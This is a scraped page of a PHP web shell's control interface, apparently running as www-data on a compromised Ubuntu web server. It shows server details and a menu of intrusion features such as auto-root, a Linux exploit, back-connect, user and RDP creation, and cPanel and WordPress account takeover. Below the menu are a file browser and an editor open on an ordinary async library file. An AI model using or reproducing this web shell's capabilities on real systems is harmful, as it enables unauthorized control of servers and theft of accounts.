Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
async /
internal /
[ HOME SHELL ]
Name
Size
Permission
Action
DoublyLinkedList.js
2.29
KB
-rw-r--r--
applyEach.js
1.03
KB
-rw-r--r--
breakLoop.js
226
B
-rw-r--r--
consoleFunc.js
1.2
KB
-rw-r--r--
createTester.js
1.25
KB
-rw-r--r--
doLimit.js
293
B
-rw-r--r--
doParallel.js
600
B
-rw-r--r--
doParallelLimit.js
653
B
-rw-r--r--
eachOfLimit.js
1.96
KB
-rw-r--r--
filter.js
2.12
KB
-rw-r--r--
findGetResult.js
200
B
-rw-r--r--
getIterator.js
307
B
-rw-r--r--
initialParams.js
514
B
-rw-r--r--
iterator.js
1.43
KB
-rw-r--r--
map.js
903
B
-rw-r--r--
notId.js
180
B
-rw-r--r--
once.js
312
B
-rw-r--r--
onlyOnce.js
361
B
-rw-r--r--
parallel.js
1.11
KB
-rw-r--r--
queue.js
5.64
KB
-rw-r--r--
reject.js
541
B
-rw-r--r--
setImmediate.js
1021
B
-rw-r--r--
slice.js
407
B
-rw-r--r--
withoutIndex.js
284
B
-rw-r--r--
wrapAsync.js
616
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filter.js
'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = _filter; var _arrayMap = require('lodash/_arrayMap'); var _arrayMap2 = _interopRequireDefault(_arrayMap); var _isArrayLike = require('lodash/isArrayLike'); var _isArrayLike2 = _interopRequireDefault(_isArrayLike); var _baseProperty = require('lodash/_baseProperty'); var _baseProperty2 = _interopRequireDefault(_baseProperty); var _noop = require('lodash/noop'); var _noop2 = _interopRequireDefault(_noop); var _wrapAsync = require('./wrapAsync'); var _wrapAsync2 = _interopRequireDefault(_wrapAsync); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function filterArray(eachfn, arr, iteratee, callback) { var truthValues = new Array(arr.length); eachfn(arr, function (x, index, callback) { iteratee(x, function (err, v) { truthValues[index] = !!v; callback(err); }); }, function (err) { if (err) return callback(err); var results = []; for (var i = 0; i < arr.length; i++) { if (truthValues[i]) results.push(arr[i]); } callback(null, results); }); } function filterGeneric(eachfn, coll, iteratee, callback) { var results = []; eachfn(coll, function (x, index, callback) { iteratee(x, function (err, v) { if (err) { callback(err); } else { if (v) { results.push({ index: index, value: x }); } callback(); } }); }, function (err) { if (err) { callback(err); } else { callback(null, (0, _arrayMap2.default)(results.sort(function (a, b) { return a.index - b.index; }), (0, _baseProperty2.default)('value'))); } }); } function _filter(eachfn, coll, iteratee, callback) { var filter = (0, _isArrayLike2.default)(coll) ? filterArray : filterGeneric; filter(eachfn, coll, (0, _wrapAsync2.default)(iteratee), callback || _noop2.default); } module.exports = exports['default'];
Close